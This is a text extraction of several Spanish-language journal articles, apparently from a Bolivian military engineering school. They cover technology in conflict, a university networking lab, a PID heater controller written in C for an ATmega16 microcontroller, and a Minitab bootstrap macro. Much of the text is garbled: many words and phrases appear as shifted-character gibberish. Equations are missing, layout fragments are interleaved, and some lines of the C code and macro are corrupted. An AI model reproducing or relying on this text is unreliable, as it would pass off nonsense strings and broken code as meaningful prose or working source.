y la comprensión, y actuará como un facilitador funKHTLU[HSLU\UM\[\YVJVUÅPJ[V3VZHJ[VYLZPYYLN\lares seguirán utilizando la tecnología ampliamente
disponible, tales como Internet, tanto para ocultar
como para promover sus actividades. Del mismo
modo, los Estados desarrollados buscarán integrar
y sincronizar plataformas, sensores y tiradores en
un intento de disminuir la “niebla de guerra”. A pesar de que las mejoras técnicas serán considerables, es probable que la ventaja táctica sea de corta
duración, a medida que los adversarios se adaptan
rápidamente.
La omnipresencia de las TIC permitirá a más perZVUHZHJJLKLY`L_WSV[HYSHZZVÄZ[PJHKHZYLKLZKL
los sistemas de información. Por ejemplo, en 2007
hubo 280 millones de suscriptores de telefonía móvil en África, una tasa de penetración del 30,4%.
Este número se espera que aumente a 50% en 2012
y puede dar lugar a una cobertura total en tan sólo
diez años. El Internet y las tecnologías asociadas,
junto con comunicaciones digitalizadas portátiles,
se convertirán cada vez más en el medio por el cual
se distribuyen de productos de información audiovisual y escrita de rápida expansión. Para muchas
personas, el grupo de pertenencia se extiende más
allá de las comunidades físicamente próximas, lo
X\LYLÅLQHSHJHWHJPKHKKLTHU[LULYYLSHJPVULZL
identidades en la distancia a través de viajes y comunicaciones globalizadas. El tamaño creciente de
las redes disponibles también aumentará las opor[\UPKHKLZLJVU}TPJHZ`ÄUHUJPLYHZWHYHSVZPUKP]Pduos y las comunidades más pequeñas a través de
PUPJPH[P]HZJVTVSHZTPJYVÄUHUaHZ
Esto puede transformar la forma de hacer negocios con un cambio de las tradicionales estructuras
jerárquicas a estructuras más pequeñas, en redes
que favorezcan una distribución más uniforme del
ILULÄJPV,SHJJLZVNLULYHSPaHKVHSHZ;0*[HTIPtU
ofrece diversas oportunidades para la delincuencia
organizada y los grupos terroristas. Estos grupos,
que a menudo se basan en los espacios sin goIPLYUVL_WSV[HYmUYLKLZHKHW[HISLZ`ÅL_PISLZX\L
desafíen los enfoques convencionales de orden público. La ubicuidad de los dispositivos de comunicaciones puede crear tensiones internas en los Estados autoritarios a medida que la censura es cada
vez más difícil de lograr y es muy difícil prevenir el
acceso “democratizado” al Internet.
REFERENCIAS BIBLIOGRÁFICAS
‹ Bowns y Cornish, A Quantitative Analysis of MoKLYU*VUÅPJ[*OH[OHT/V\ZL0U[LYUH[PVUHS:Lcurity Programme, 2009.
‹ Bowns y Middleton, The Effect of Defence R&D
on Military Equipment Quality, Defence and Peace Economics 2006, Volume 17(2), Abril 2006,
pag. 117 - 139.
‹ 4LKPUH+VTtULJO9VZH4¡`9VKYxN\La(SJmzar, F. Javier, “Ciencia, tecnología y militarismo”.
España 2005.
‹ 9(5+ ,\YVWL Perspectives on the Future of
*VUÅPJ[!<246++PZJ\ZZPVU7HWLY, May 2009.
‹ Stockholm International Peace Research Institute (SIPRI) Handbook 2008, pág. 316.
P
A
R
A
D
I
G
M
A
Laboratorio de Redes
13
REDES DE COMUNICACIONES Y
COMUNICACIONES DE REDES
P
Ing. Javier Felipe de Jesús Berthin Heredia JEFE DE PROYECTOS ALPHA SYSTEMS
720-02930
[email protected]
[email protected]
A
RESUMEN
R
A
D
I
G
M
A
14
El protagonismo de las redes de comunicaciones,
que en el presente forman parte de nuestras vidas,
han demostrado que cada uno de nosotros, podeTVZZHJHY\UZPUMxUKLILULÄJPVZ`WYV]LJOVZ[HU[V
a nivel personal como en comunidad, considerando
sobre todo, que en la mayoría de las redes de coT\UPJHJPVULZLZ[HTVZSVNYHUKV\UHÅ\PKLaKLPUformación y minimizando las distancias y el tiempo
para el acceso a dicha información.
PALABRAS CLAVE
Redes, Comunicaciones, Networking, Inter Networking
INTRODUCCIÓN
Como todos bien sabemos, los términos RED o
NETWORK representan de alguna forma para los
más o menos entendidos, un servicio al cual podemos acceder en la mayoría de los casos como
usuarios. Es el caso de la red de servicio de agua
y alcantarillado, la red de servicio eléctrico, la red
KLZLY]PJPVKL[LSLMVUxHÄQHVKL[LSLMVUxHT}]PS@
hoy en día, aunque de forma un poco más sencilla, tenemos otros tipos de redes de servicios que
OHUPKVLTLYNPLUKVWYPUJPWHSTLU[LJVU\UZVSVÄU
el de proveer servicios distribuidos y desplegados
NLVNYmÄJHTLU[L`X\LZLVYPLU[LUHX\LLS\Z\Hrio, el cliente, pueda acceder u obtener información
y sobretodo resultados no importando la posición
NLVNYmÄJHLUSHX\LZLLUJ\LU[YL,ZLSJHZVWVY
ejemplo, de las redes de farmacias, que en nuestro
país, ahora ya cuentan con centros de atención a
nivel nacional, y donde uno puede inclusive saber
de forma más precisa y actualizada, la existencia de
algún fármaco o medicina, que hasta se lo puede
adquirir en otras ciudades o para otras ciudades.
Lo que describimos líneas arriba no es más que
un servicio, que nos garantiza el poder obtener
resultados concretos y satisfacer nuestras necesidades, para esto comenzamos a cambiar nuestros
conceptos, y es que en un banco, en un punto de
cobranza, en un centro farmacéutico, cajeros au-
tomáticos, adquirimos la idea de que son “puntos
de acceso” donde podremos conseguir nuestros
objetivos.
Una vez que asimilamos que estos “puntos de acceso” son la posibilidad de acceder a información y sobretodo transacciones de todo tipo, el siguiente paso
es poder analizar cuál puede ser el límite de estas
redes de servicios, y es así que podemos comenzar a catalogar redes pequeñas, redes locales, redes
TLKPHUHZ NYHUKLZ J\`H JSHZPÄJHJP}U KLWLUKLYm
concretamente del alcance y cobertura que brinden
a sus usuarios. Un ejemplo de una red con cobertura mundial es el sistema SABRE, que se encarga de
gestionar la reserva y compra / venta de pasajes en
las líneas aéreas. Y hay muchos otros ejemplos todavía más claros como ser las redes de intercambio
de información en línea para mensajería, buscadores,
correo electrónico y muchas otras aplicaciones.
Figura 1. Sistema SABRE, red de cobertura mundial
RED DE SERVICIOS OPERATIVA
En base a esta introducción y conceptos sobre
redes, nos enfocamos en que la importancia de
LU[LUKLYSVJYP[PJVX\LZPNUPÄJHLSOLJOVKLSVNYHY
que las redes de servicios se mantengan operativas y con provisión de servicios, si es posible, las
24 horas del día. Es así, que para nosotros como
usuarios, el tener un problema de acceso a internet,
ya se nos convierte en una gran frustración, ni que
decir, si me voy a comprar un pasaje aéreo, y en
la agencia de turismo o línea aérea me responden
que “No hay sistema”, y inclusive yéndonos a algo
muy simple, que en una farmacia, tenga que tardar
el doble o triple de tiempo, para poder obtener un
simple medicamento, que por problemas en la red,
no permite desplegar el sistema de inventarios para
saber cuál es el saldo de dicho ítem.
Al darnos cuenta de lo importante que es tener una
red de servicios operativa, debemos saber que los
ZLY]PJPVZ ZVU HWSPJHJPVULZ KLZHYYVSSHKHZ JVU ÄULZ
objetivos y que con ayuda de bases de datos, algoritmos de búsqueda, y transaccionales, logran el
VIQL[P]V KL SVZ \Z\HYPVZ ÄUHSLZ 7LYV [VKHZ LZ[HZ
aplicaciones, están viajando y transportando información a través de una “plataforma” que en si es la
“red de comunicaciones”. El concepto más simple
de una red de comunicaciones de cualquier tipo, es
que son simplemente “RUTAS” o caminos por los
J\HSLZ`VW\LKV]PHQHY[YHUZWVY[HY`[YHÄJHYPUMVYmación en sentido bidireccional, logrando un proceso de transmisión y recepción con determinados
objetivos. Las rutas son creadas en forma física y
lógica y todo esto es parte de un gran campo de actividades y profesiones que se centralizan en áreas
de NETWORKING e INTER-NETWORKING. Estas 2
áreas se centralizan en nuestra primera parte del título del artículo que es “redes de comunicaciones”
Para hacer que las rutas estén disponibles hoy en
día se cuentan con una gran cantidad de herramientas y especializaciones en las carreras de Ingeniería
de Sistemas, de Telecomunicaciones, Electrónica,
Informática, Telemática, las cuales de una forma u
otra van a resumir sus actividades dentro del conocido modelo OSI principalmente con el objetivo de
segmentar las capas o niveles de soluciones a los
problemas que se presentan desde la capa física
hasta la capa de aplicaciones.
LABORATORIO DE REDES DE LA EMI
En la ESCUELA MILITAR DE INGENIERIA, se han
estado formando profesionales con conocimientos
y experiencia muy sólidos en las distintas carreras
que ofrecen, y ahora, luego de un proceso de aná-
lisis y dimensionamiento adecuado, se está implementando un laboratorio que permita preparar a los
estudiantes, para encarar y poder tener la preparación y experiencia en lo relacionado a la instalación,
ZVWVY[LJVUÄN\YHJP}U`VW[PTPaHJP}UKLYLKLZKL
JVT\UPJHJPVULZ,Z[VZPNUPÄJHX\LLSM\[\YVWYVMLsional que egresa de la E.M.I., no solamente tendrá
el conocimiento conceptual sino que podrá haber
ya encarado el manejo de equipamiento de redes,
y lo más importante, brindar a los estudiantes ese
NYHUZHS[VKLSVX\LZPNUPÄJHLSTHULQV`HKTPUPZtración de equipos reales de redes que hoy existen
en un 99% de las redes más grandes y corporativas
de nuestro país y del mundo entero.
Para encarar este tipo de proyectos, se requiere de
“Visión”, dado que cualquier tipo de proyectos relacionados a plataforma y equipamiento de comunicaciones y telecomunicaciones, son inversiones
fuertes y que deben tener un análisis de retorno a
dicha inversión. Es éste el elemento que ha permitido por parte de los directores y ejecutivos de
la E.M.I. para poder alcanzar y lograr un paso importantísimo para la institución y estudiantes, dado
que este es un laboratorio que no hay en ninguna
otra institución de educación superior ni técnica especializada y que da un importante valor adicional
a las carreras.
Pero la Visión de la que hablamos no queda ahí.
Porque la tecnología es muy dinámica, y constantemente va migrando y evolucionando, razón por la
cual, las redes de comunicaciones hace un tiempo,
se concentraban en la parte de transmisión de DATOS, y con esto se lograba satisfacer la integración de todas las aplicaciones que involucran la
transferencia de información. Pero hoy en día, ya
escuchamos hablar de “Redes Convergentes”, las
cuales se orientan a integrar lo tradicional que era
el mundo de datos, con aplicaciones en “Tiempo
Real”, como ser la integración de aplicaciones de
voz y video.
Las redes convergentes hoy en día, son el escenario ideal para que una corporación o una empresa
pueda integrarse con aplicaciones de distintos proK\J[VZHZ\ZWVSx[PJHZKLÅ\QVKLPUMVYTHJP}U3VZ
primeros requerimientos fueron y son satisfechos
con soluciones que hoy en día son muy conocidas
como el Skype, y herramientas de mensajería instantánea y que nos permite a la vez poder compartir recursos e información a través de la nube
pública que es Internet.
Sin embargo, a medida que pasa el tiempo, estos
requerimientos también van requiriendo de herraTPLU[HZ TmZ LZWLJPÄJHZ ` X\L JVYWVYH[P]HTLU[L
P
A
R
A
D
I
G
M
A
15
P
WVKYmU WLYZVUHSPaHY Å\QV KL PUMVYTHJP}U ` HWSPJHciones privadas y que puedan satisfacer políticas
concretas y que a la vez puedan orientarse a concretar el Retorno a La Inversión que las empresas
van haciendo en el rubro tecnológico.
A
Lo ideal, es que la convergencia de la que hablamos, permita que los equipos puedan soportar estas nuevas aplicaciones y requerimientos, de tal
manera, una inversión es mucho mejor aprovechada, y permite una migración e integración de servicios, con mínimos cambios en la red y sobretodo
en sus equipamientos.
R
A
D
I
G
M
A
16
De la misma forma, es sumamente importante menJPVUHYX\LZPIPLUOH`LULSTLYJHKV\UZPUÄUKL
aplicaciones y ofertas de equipos y soluciones, es
crítico poder analizar cuánto del tiempo de personal de la Empresa o Corporación se puede gastar o
utilizar, solamente intentando solucionar problemas
técnicos, los cuales por ser de diferentes marcas,
o interfaces de usuarios, requieran de tiempos de
aprendizaje y niveles de dependencia créticos. Entonces entendemos que la GESTION DE RED, se
convierte en una variable muy importante a considerar. Esta variable en muchos casos apunta a ser
centralizada hoy en día, pero a la vez, debería considerarse su potencial “movilidad” y acceso remoto, para no crear una dependencia logística.
De tal manera, aplicaciones como Telefonía IP, Voz
sobre IP, Video Conferencia, y aplicaciones compartidas, podrían tener un soporte centralizado y
descentralizado a la vez, que permita el uso de estas aplicaciones desde cualquier punto de la red
corporativa.
Es importante complementar que el laboratorio que
la E.M.I. está implementando, también está orientado a este tipo de soluciones y aplicaciones, en
una fase preliminar, también está incluído dentro
de la currícula de aprendizaje. De tal manera, complementariamente a una cantidad de prácticas y de
SHIVYH[VYPVZX\LZL]HUHPTWSLTLU[HYJVULSÄUKL
dar la experiencia y practica en el campo real a los
futuros profesionales, también a la vez los va a formar y preparar para el momento en el cual deseen
YLUKPYZ\ZJLY[PÄJHJPVULZJVTVSHKLS**5(T\`
conocida en cualquier tipo de trabajo relacionado
a redes, y complementariamente, los equipos adquiridos por la E.M.I, también está preparados para
soportar proyectos con infraestructura compatible
con IP versión 6, y que a la vez puedan interactuar
entre los 2 escenarios tanto de IPv4 como IPv6.
Complementariamente los equipos también están
proyectados a satisfacer laboratorios y preparación
WHYH SH JLY[PÄJHJP}U KL **57 [HTIPtU T\` IPLU
conocida y desplegada en todo los escenarios de
redes y comunicaciones y cuenta con los componentes esenciales para preparación para exámenes
de voz y telefonía IP, y de comunicaciones inalámbricas con componentes del espectro 802.11 a/b/
g/n.
COMUNICACIONES DE REDES
No satisfechos con todo lo descrito anteriormente
y de forma breve pero a la vez con el objetivo de
no dejar este articulo incompleto, es que mencionamos lo que hoy en día son las “comunicaciones
de redes” y es que la tecnología y la convergencia
de redes está avanzando tan dinámicamente, que
para nosotros es muy usual haber escuchado servicios Triple Play, que se orientan a la provisión de
servicios por un solo medio, pudiendo ser una red
TL[YVÄIYHOHZ[HLSOVNHYH[YH]tZKLSJHISLJVHxial del video cable. Este tipo de servicios apuntan
a proveer servicios de distinto tipo dentro de una
sola infraestructura, de tal manera que para cualquier usuario el poder acceder a estos servicios solamente se concentra en 1 tipo de proveedor y una
sola conexión hacia la casa o residencia.
El termino nuevo que se está comenzando a esJ\JOHY LZ LS KL ¸*VT\UPJHJPVULZ <UPÄJHKHZ¹ V
“Colaboración”, donde han comenzado a predominar la integración de Computadoras de escritorio,
computadoras Laptops, o netbooks, o ultrabooks,
también de dispositivos plenamente móviles como
las tabletas y sobre todo los Smartphones o teléfonos inteligentes o los sensacionales phablets que
concentran en un solo sistema un conglomerado
de aplicaciones tanto públicas como corporativas.
La comunicación de redes, tiene como principal objetivo, subir servicios de voz, de video y de datos a
una sola plataforma, y si es posible inscribirla en un
solo dispositivo, donde un usuario bajo el concepto de manejar un sistema operativo, este indirectamente integrando las aplicaciones que permiten
sintonizar todo el espectro de soluciones, programas y aplicaciones emergentes en el mercado.
CONCLUSIÓN
Queda mucho por delante, y por lo dinámico que
se convierte este campo, nos importa mucho poder
agarrar el ritmo, e ir asimilando este hermoso y fantástico mundo de las telecomunicaciones.
CONTROLADOR DIGITAL PID EN
UN MICROCONTROLADOR ATMEL
Ing. Germán Jesús Pereira Muñoz
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
Irpavi (La Paz) Bolivia
P
A
RESUMEN
Dado el amplio uso de los controladores PID en
el ámbito industrial (control de potencia en motores de inducción, control de nivel, caudal y presión en procesos químicos entre otros), el uso de
microcontroladores para el desarrollo de este tipo
de aplicaciones ha tomado fuerza gracias a la incorporación de lenguajes de alto nivel que facilitan
ampliamente este tipo de implementaciones, además de los bajos costos de adquisición de estos
dispositivos, distribución de software de desarrollo
gratuito (GNU) y amplia información en la Internet.
Este artículo tiene como propósito mostrar un método de diseño práctico y sencillo en el desarrollo
de controladores digitales PID implementados en
TPJYVJVU[YVSHKVYLZ(;4,37HYH[HSÄUZL[VTHYH
como ejemplo un sistema de calefacción (heater)
al cual se le realizara inicialmente un modelamiento basado en el método de curva de reacción, calculo de parámetros y/o constantes de control PID
mediante técnica de sintonización Ziegler–Nichols
y por ultimo se mostrara la metodología de implementación de este controlador en un microcontrolador ATMEGA16, utilizando como herramienta de
validación el software de simulación ISIS Proteus.
En el dominio de la frecuencia, el controlador PID
se puede escribir como:
SINTONIZACIÓN DE CONTROLADOR MEDIANTE ZIEGLER-NICHOLS
,USHaVHIPLY[VT\JOVZWYVJLZVZW\LKLUKLÄUPYse según la siguiente función de transferencia:
+VUKL SVZ JVLÄJPLU[LZ 2 ` ZL VI[PLnen de la respuesta del sistema en lazo abierto
a una entrada escalón. Se parte del sistema estabilizado en y(t) =y0 para u(t)=u0. Se aplica una
entrada escalón de u0 a u1 (el salto debe estar
entre un 10% y un 20% del valor nominal) y se
registra la respuesta de la salida hasta que se
estabilice en el nuevo punto de operación [2].
Los parámetros se pueden obtener de la respuesta mostrada en la Figura 1:
CONTROLADOR PID
Es interesante señalar que más de la mitad de los
controladores industriales que se usan hoy en día utiSPaHULZX\LTHZKLJVU[YVS70+V70+TVKPÄJHKV3VZ
controladores PID analógicos, son principalmente
de tipo hidráulico, neumático, electrónico, eléctrico
o sus combinaciones. En la actualidad, muchos de
estos se transforman en formas digitales mediante el
uso de microprocesadores [1]. Se puede indicar que
un controlador PID responde a la siguiente ecuación:
R
A
D
I
G
M
A
donde e(t) es el error de la señal y u(t) es la entrada
de control del proceso. Kp es la ganancia proporcional, Ti es la constante de tiempo integral y Td
es la constante de tiempo derivativa.
Figura 1. Respuesta de salida ante una entrada
escalón.
17
P
Según Ziegler-Nichols, la relación de estos coeÄJPLU[LZJVUSVZWHYmTL[YVZKLSJVU[YVSHKVYZVU!
CONTROLADOR DIGITAL PID
A
R
La función de transferencia para el controlador PID
digital se convierte en [3]:
La función de transferencia discreta (6), también
puede ser representada como [2]:
A
D
Existen distintas posibilidades de la realización
práctica de un controlador PID, una de las mas
habituales es la realización en paralelo:
I
M
Figura 2. Diseño paralelo de controlador PID.
ALGORITMO DE PROGRAMACIÓN EN MICROCONTROLADOR
MODELAMIENTO DEL SISTEMA DE CALEFACCIÓN
Temperature Ambient (°C)= 25
Thermal Resistence to Ambient (°C/W)= 0.7
Oven Time Constant (sec)= 1000
Heater Time Constant (sec)= 1
;LTWLYH[\YLJVLMÄJPLU[=‡*$
Heating Power (W)= 20
El modelo esquemático OVEN contiene un terminal
sensor T que entrega un voltaje proporcional a la
temperatura del sistema. De acuerdo a los parámetros establecidos anteriormente, este terminal entregara 1V/°C, es decir, que para una temperatura
de 100°C, el terminal T entregara 100V.
Para obtener la respuesta del sistema en lazo abierto ante una entrada escalón (curva de reacción), se
utiliza el sistema de análisis interactivo de ISIS Proteus Interactive Analysis (Graph Mode Tool), el cual
interactúa con el sistema OVEN mediante el uso de
un Voltage Probe1 OV1(T), según se muestra en la
Figura 4. Observar que para realizar la entrada escalón de 0V a 2V se utiliza un interruptor SW1.
El algoritmo utilizado para programar el ATMELse
muestra en la Figura 3. El muestreo (T) debe ser
mayor que el tiempo de establecimiento del sistema en lazo abierto. En el modelo Ziegler-Nichols
ZL[VTH\U]HSVY;# Figura 4. Esquemático para análisis de respuesta
ante entrada escalón.
A
18
Temperatura Ambiente de trabajo, resistencia térmica, constante de tiempo de establecimiento,
JVUZ[HU[LKL[PLTWVKLJHSLU[HTPLU[VJVLÄJPLU[L
de temperatura y Potencia de calentamiento.
Para facilidades de simulación se establecerán los
siguientes valores de parámetros funcionales del
modelo OVEN:
Donde:
G
Para la implementación y simulación del controlador PID se utilizara el software ISIS Proteus. Este
software ofrece el modelo esquemático de un sistema de calefacción denominado OVEN, al cual se le
pueden variar sus características funcionales tales
como:
De la recta de máxima pendiente se deducen los
WHYmTL[YVZ `RKLÄUPKVZWVYLSHUmSPZPZLU
lazo abierto de Ziegler-Nichols.
Figura 3. Algoritmo de programación de PID digital en microcontrolador.
PID en el microcontrolador, el código fuente propuesto es:
CÓDIGO FUENTE EN LENGUAJE C PARA CONTROLADOR PID DISCRETO
Figura 5. Determinación de los parámetros por método de curva de reacción.
Por tanto el modelo del sistema de calefacción
X\LKHKLÄUPKVHZx!
1 Hacer click derecho sobre el Interactive Analysis,
seleccionar Add Traces Ctrl+A y anexar el OV1(T).
Los parámetros Kp, Ti y Td se calculan según la
Regla de Sintonización de Ziegler-Nichols basada
en la respuesta al escalon [1]:
Remplazando los valores de Kp, Ti y Td en las
ecuaciones dadas en (8), y estableciendo un peYPVKVKLT\LZ[YLV;$ZZLN‚UJYP[LYPV;# los parámetros del controlador discreto son:
IMPLEMENTACIÓN DE CONTROLADOR DIGITAL PID EN MICROCONTROLADOR
Consideraciones Preliminares
Se requiere de un conversor Análogo/Digital para
ingresar el voltaje entregado por el sensor T del
modelo OVEN. Dado que dicho terminal entrega
1V/°C, se utiliza un divisor de voltaje para adecuar
la señal del sensor a niveles permitidos por el conversor A/D; en este caso se utiliza un divisor de
voltaje con factor 100, es decir, que para una temperatura de 100°C (100V) el conversor recibirá 1V.
El control se realiza mediante una señal PWM proporcional a la señal generada por el controlador.
Por tanto el uso del microcontrolador ATMEGA16
[6] es pertinente para la aplicación descrita.
Para la realización del código fuente se utilizo el
compilador WINAVR [4], [5]. De acuerdo al algoritmo planteado en la Figura 4 para programación de
#include <avr/io.h>
#include <inttypes.h>
#include “global.h”
#include “a2d.h”
#include “timer.h”
PWM, etc)
// Acceso de control I/O
// Tipos de datos
// libreria de adc
// libreria de timer (timing,
#include <util/delay.h>
int main(void)
{
u16 valor, control;
//Variables para lectura de
ADC y señal de Control a módulo CCP
ÅVH[HIJ"
*VUZ[HU[LZ WHYH WHYmmetros de controlador PID
ÅVH[TEMPERATURA_LIMITE; //Referencia
de
Temperatura
ÅVH[Y;L;P;K;`;\;P;L;" =HYPHISLZ
KL
controlador PID
ÅVH[TH_TPU"
=HYPHISLZ WHYH HU[P^PUdup
min=0.0;
max=1000.0;
iT0=0.0;
eT0=0.0;
a=0.1243;
b=0.0062;
c=0.6215;
TEMPERATURA_LIMITE=1200.0;
//Set Point
r(kT)= 120°C
a2dInit();
//Activando el conversor
ADC
a2dSetPrescaler(ADC_PRESCALE_DIV32);
a2dSetReference(ADC_REFERENCE_AVCC);
sbi(DDRD, PD4);
sbi(DDRD, PD5);
// initialize the timer system
timerInit();
timer1PWMInit(8);
// Inicializando el PWM
timer1PWMAOn();
//timer1PWMBOn();
while(1)
{
valor=a2dConvert10bit(0); //Leer ADC Canal 0
TEMPERATURA_LIMITE=a2dConvert10bit(1); //
Set Point r(kT)
yT=(5000.0*valor)/1024.0; //Escalizar señal de salida y(kT)
rT=(5000.0*TEMPERATURA_LIMITE)/1024.0;
eT=rT-yT;
//Calcular senal de error
e(kT)
iT=b*eT+iT0;
//Calcular termino integrativo i(kT)
P
A
R
A
D
I
G
M
A
19
P
A
R
A
D
I
dT=c*(eT-eT0);
//Calcular termino derivativo
d(kT)
uT=iT+a*eT+dT;
//Calcular senal de control
u(kT)
if (uT>max)
{ //Anti-windup
uT=max;
}
else
{
if (uT<min)
{ uT=min;}
}
control=uT;
timer1PWMASet(control); //Transferencia de senal
de control al actuador
iT0=iT;
eT0=eT; //_delay_ms(100); //Periodo de muestreo
T=0.1s
}
return(0); }
DIAGRAMA ESQUEMÁTICO Y SIMULACIÓN DE
CONTROLADOR PID EN ISIS PROTEUS
Para la generación de perturbaciones se utiliza el
conmutador SW1, el cual permite cambiar el valor de la fuente de alimentación al sistema OVEN.
Para el instante de tiempo t=0s. se utilizo la fuente
de alimentación BAT2 de 12V, para el instante de
tiempo t=60s se conmuto a la fuente de alimentación BAT1 de 24V y para el instante de tiempo
t=105s se conmuto nuevamente a la fuente de
alimentación BAT2 de 12V. Como se puede apreciar en la Figura 6, el controlador PID responde de
THULYH T\` LÄJPLU[L ZPN\PLUKV SH YLMLYLUJPH KL
120°C establecido en el código fuente.
G
Figura 7. Diagrama esquemático de controlador
PID en microcontrolador
Figura 8. Diagrama esquemático de microcontrolador utilizando el algoritmo controlador PID en
una aplicación de control en tiempo real
Figura 9.7HU[HSSHNYHÄJHJVUSHZHSPKHKLSZPZ[LTH
aplicando el algoritmo de control PID
OBSERVACIONES
M
Figura 6a. Resultado de la simulación mediante Interactive Analysis.
La escalizacion de la señal de salida y(kT) en el
código fuente se debe multiplicar por un factor de
100 debido al factor de división que se utilizo para
adecuar la señal del sensor del sistema OVEN.
A
20
Las resistencias R1 y R2 son de 99k y 1k respecti]HTLU[L3HJVUÄN\YHJP}UTVZ[YHKHLUSH-PN\YH
permite obtener un divisor de voltaje con factor 100.
Figura 6b. Resultado de la simulación mediante
Interactive Analysis.
La simulación inicia con una magnitud de temperatura igual a 25°C en t=0s, dado que este valor
es la temperatura ambiente de trabajo del sistema
OVEN.
Si desea hacer mas interactivo el sistema de control propuesto, se puede variar el código fuente
para que el valor de referencia r(kT) o Set Point
pueda ser ingresado por usuario a través de un
teclado matricial o a través de un PC utilizando
comunicación RS-232.
CONCLUSIONES
El uso de lenguajes de programación de alto nivel;
como es el caso del compilador WINAVR, facilita
ampliamente la implementación de controladores
PID u otro tipo de esquema de controlador sobre
dispositivos microcontrolados, abriendo así una
alternativa de desarrollo de sistemas de control a
bajo costo, dado que este lenguaje permite fácilmente adicionar periféricos para ingreso de datos
y supervisión de variables de estado del sistema
controlado; como por ejemplo teclados matriciales
y LCD’s respectivamente, y además la implementación de sistemas de comunicación tales como
USB, CAN, Ethernet, Bluetooth entre otros, ya son
soportados por algunas gamas de microcontroladores y pueden ser administrados fácilmente a
través de este tipo de compiladores.
Como bien se explica en el desarrollo de este paper, la tarea fundamental para el diseño de un con-
trolador PID esta en la obtención de los parámetros del sistema que se desea controlar (planta),
dado que a partir de estos parámetros se utilizan
reglas de sintonización para hallar las constantes
del controlador Kp, Ti y Td. Una vez calculadas
estas constantes podrá utilizar como Template el
código fuente expuesto, y solo requerirá reemplazar el valor de las constantes del controlador PID
y por supuesto el respectivo valor de Periodo de
Muestreo, el cual esta en términos de solamente
un retardo.
BIBLIOGRAFIA
1 Ogata, Katsuhiko. Ingeniería de Control Moderna. Controles PID e introducción al control
robusto. Tercera edición. Pagina 669. Editorial
Prentice Hall. 1998.
2 Ogata, Katsuhiko. Sistemas de control en tiempo discreto. Segunda edición. Pagina 116. Editorial Prentice Hall. 1996.
3 ATMEL Atmega16 Datasheet. Disponible en
internet en http://www.atmel.com/downloads/
DeviceDoc/3282b.pdf.
P
A
R
A
D
I
G
M
A
,Z[\KPHU[LZVÄJPHSLZKLSHZ[YLZM\LYaHZ`JP]PSLZ
21
P
APLICACIÓN DEL MÉTODO
BOOTSTRAP PARA LA
ESTIMACIÓN DEL ERROR
ESTÁNDAR DE LA MEDIA
MUESTRAL
A
R
Lic. Dindo Valdez Blanco
Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería
Irpavi (La Paz) Bolivia
RESUMEN
A
D
I
G
M
A
22
En este artículo se presenta una aplicación del
método de estimación denominado Bootstrap,
LZWLJxÄJHTLU[L HWSPJHKV LU SH LZ[PTHJP}U KL SH
desviación estándar del estimador de la media y la
mediana. Para realizar la aplicación se desarrolla
una macro realizada en el programa Minitab versión
15.0 en español para Windows.
PALABRAS CLAVE
bootstrap, minitab, error estándar, intervalo de conÄHUaHWYLJPZP}U
INTRODUCCIÓN
En la mayoría de los estudios estadísticos se utilizan
los estimadores clásicos como la media muestral, y
en base a la misma se calculan intervalos de conÄHUaHWHYHSHTLKPHWVISHJPVUHSLSWYVISLTHYHKPca cuando se desea utilizar otro estimador como
la mediana muestral, surge entonces la pregunta
¦LZWVZPISLJHSJ\SHY\UPU[LY]HSVKLJVUÄHUaHWHYH
la mediana poblacional?, justamente este artículo
propone el uso de la metodología Bootstrap como
una alternativa de respuesta.
El método Bootstrap es una buena opción para realizar estimaciones cuando los estadísticos son difíciles de manipular algebraicamente y no se puede
encontrar una expresión matemática de sus estadísticas como el error estándar del estimador de la
mediana, en vista que dicho estimador está relacionado con los estadísticos de orden, su función de
probabilidad depende del tamaño de la muestra y
de la función de distribución de donde es extraída
la muestra aleatoria.
ESTIMACIÓN DEL ERROR ESTÁNDAR DE LA
MEDIANA POR EL MÉTODO BOOTSTRAP
Para desarrollar el concepto, se generan 50 datos
aleatorios de una ley de probabilidad exponencial
JVUTLKPH $SHÄN\YHT\LZ[YHLSOPZ[VNYHTH
de los datos obtenidos por simulación.
EL MÉTODO BOOTSTRAP
En estadística, el método Bootstrap, es aplicado
para estimar la medida de precisión de los estimadores muestrales denominado el error estándar del
estimador. Esta técnica permite la estimación de la
distribución muestral de cualquier estimador utilizando únicamente un método de remuestreo. Lo
HU[LYPVYLZ‚[PSWHYHJHSJ\SHYPU[LY]HSVZKLJVUÄHUaH
y pruebas de hipótesis de estadísticos como la mediana muestral, la correlación muestral, etc.
Figura 1. Histograma de la muestra aleatoria exponencial
Considerando este conjunto de datos como una
muestra aleatoria de tamaño n=50, se calcula una
media muestral ¯x=15.98 y la desviación estándar
de la muestra S=16.31. De esta manera el estimador de la media de la distribución de probabilidad
L_WVULUJPHSM_$ LE_ HWHY[PYKLSTt[VKV
de momentos o del método de máxima verosimili[\KLZ!›ÿ$ ÿ$Þ_$ Luego el error estándar estimado del estadístico ¯x
está dado por:
Utilizando el método Bootstrap para realizar tal estimación del error estándar de la media, es necesario emplear el siguiente proceso:
1° Se selecciona una muestra aleatoria con reemplazo de la muestra original con el mismo tamaño n=50 y se calcula la media de la
muestra ¯x.
2° Se repite el paso 1º un número de veces determinado digamos B, y se calcula media
muestral en cada caso: ¯x_1,¯x_2,…,¯x_B.
3° Se calcula la desviación estándar de los B
promedios estimados en el paso 2º y se toma
este valor como la estimación del error estándar de ¯x.
En el método Bootstrap es necesario que las muestras generadas en el paso 2º sean del mismo tamaño n de
Macro
# Inicio de la macro
bootstrap c1
# En este paso se nombra la macro como boot1
mcolumn c1 c10 c11
:LKLÄULUSHZJVS\TUHZKVUKLZLHSTHJLUHYmU
los datos
mconstant k1 k2 k3 k4 k5
:LKLÄULUSHZJVUZ[HU[LZKLSWYVNYHTH
erase c10
# Se borran los datos de la columna c10
let k1 = n(c1)
# Se hace que la consante k1 sea igual al tamaño
de la muestra
let k2 = 300
:LKLÄULLSU‚TLYVKLT\LZ[YHZ)X\LZLNLULrarán
do k4=1:k2
# Inicio del contador k4 que va de 1 a k2
sample k1 c1 c11;
# Se genera una muestra aleatoria con reemplazo
de tamaño replace.
# k1 de la columna c1 y se almacena en la columna c11
let k5 = mean(c11)
# Se calcula la media muestral y se almacena en
k5
stack c10 k5 c10
# Se almacena la media muestral en la columna
c10
enddo
# Fin del contador
let k3 = stdev(c10)
# Se calcula la desviación estándar de las medias
muestrales
print k3
# Se imprime el error estándar estimado de la
media muestral
endmacro
# Fin de la macro
